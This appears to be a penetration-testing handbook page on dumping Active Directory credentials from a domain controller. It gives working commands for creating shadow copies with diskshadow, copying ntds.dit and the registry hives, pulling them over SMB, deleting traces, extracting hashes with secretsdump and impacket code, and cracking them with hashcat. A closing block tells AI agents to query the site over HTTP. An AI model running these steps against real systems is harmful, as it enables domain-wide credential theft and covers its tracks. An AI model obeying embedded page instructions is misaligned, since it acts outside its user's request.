# NTDS * ## Shadow Disk ### Create via Diskshadow Locate `diskshadow.exe`: ``` cmd /c where /R C:\ diskshadow.exe ``` Create a shadow disk: ``` cd \Windows\Temp powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'" powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'" powershell -c "Add-Content add_vol.txt 'set verbose on'" powershell -c "Add-Content add_vol.txt 'begin backup'" powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'" powershell -c "Add-Content add_vol.txt 'create'" powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'" powershell -c "Add-Content add_vol.txt 'end backup'" cmd /c diskshadow.exe /s add_vol.txt ``` {% code title="add\_vol.txt" %} ``` set context persistent nowriters set metadata C:\Windows\Temp\meta.cab set verbose on begin backup add volume c: alias DCROOT create expose %DCROOT% w: end backup ``` {% endcode %} ### Exfiltrate over SMB Create a network share with anonymous access and put there all we need: ``` cd \Windows\Temp copy w:\Windows\NTDS\ntds.dit ntds.dit cmd /c reg.exe save hklm\system system.hive cmd /c reg.exe save hklm\sam sam.hive cmd /c reg.exe save hklm\security security.hive ``` Connect to the share and grab the files: ``` $ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11 use C$ cd windows/temp get ntds.dit get system.hive get sam.hive get security.hive ``` ### Clean Up Remove the shadow volume: ``` cd \Windows\Temp powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'" powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'" powershell -c "Add-Content delete_vol.txt 'set verbose on'" powershell -c "Add-Content delete_vol.txt 'unexpose w:'" powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'" powershell -c "Add-Content delete_vol.txt 'reset'" cmd /c diskshadow.exe /s delete_vol.txt ``` {% code title="delete\_vol.txt" %} ``` set context persistent nowriters set metadata C:\Windows\Temp\meta.cab set verbose on unexpose w: delete shadows volume c: reset ``` {% endcode %} Remove the share and all the traces: ``` cd \Windows\Temp rm ntds.dit rm system.hive rm sam.hive rm security.hive rm C:\Windows\Temp\meta.cab rm add_vol.txt rm delete_vol.txt ``` ## Raw NTDS.dit Copy * * Obtain a copy of NTDS.dit: ``` PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit ``` Parse on-site in conjunction with [NtdsAudit](https://github.com/dionach/NtdsAudit/releases): ``` PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o PS > reg.exe save HKLM\SYSTEM system.hive PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt ``` Parse on-site in conjunction with [secretsdump.exe](https://github.com/Qazeer/OffensivePythonPipeline/blob/main/binaries/impacket/secretsdump_windows.exe): ```python from binascii import hexlify from impacket.smbconnection import SMBConnection from impacket.examples.secretsdump import RemoteOperations hostname = 'DC01.megacorp.local' username = 'snovvcrash' password = '' nthash = '' if password else '' domain = hostname.split('.', 1)[1] smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname) smbConn.login(user=username, password=password, domain=domain, nthash=nthash) remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False) remOps.enableRegistry() bootKey = remOps.getBootKey() print(hexlify(bootKey).decode()) remOps.finish() # .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey ``` ## Parse NTDS.dit Parse with [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py): ``` $ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt $ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in $ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule ``` Parse with [aesedb](https://github.com/skelsec/aesedb) (faster but less informative): ``` $ antdsparse ntds.dit -o ntds.txt --progress $ antdsparse system.hive ntds.dit -o ntds.txt --progress ``` Parse with ntdissector: * * ### Reversible Encryption * * Check if enabled globally: * gpmc.msc > Default Domain Policy > *Computer Configuration* > *Policies* > *Windows Settings* > *Security Settings* > *Account Policies* > *Password Policy* > *Store passwords using reversible encryption* > *Enabled* ✔ Check if enabled for specific users: ``` PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt ``` {% hint style="info" %} When DCSyncing such users, a cleartext password will be obtained. {% endhint %} ## Tools * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/credential-harvesting/ntds.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.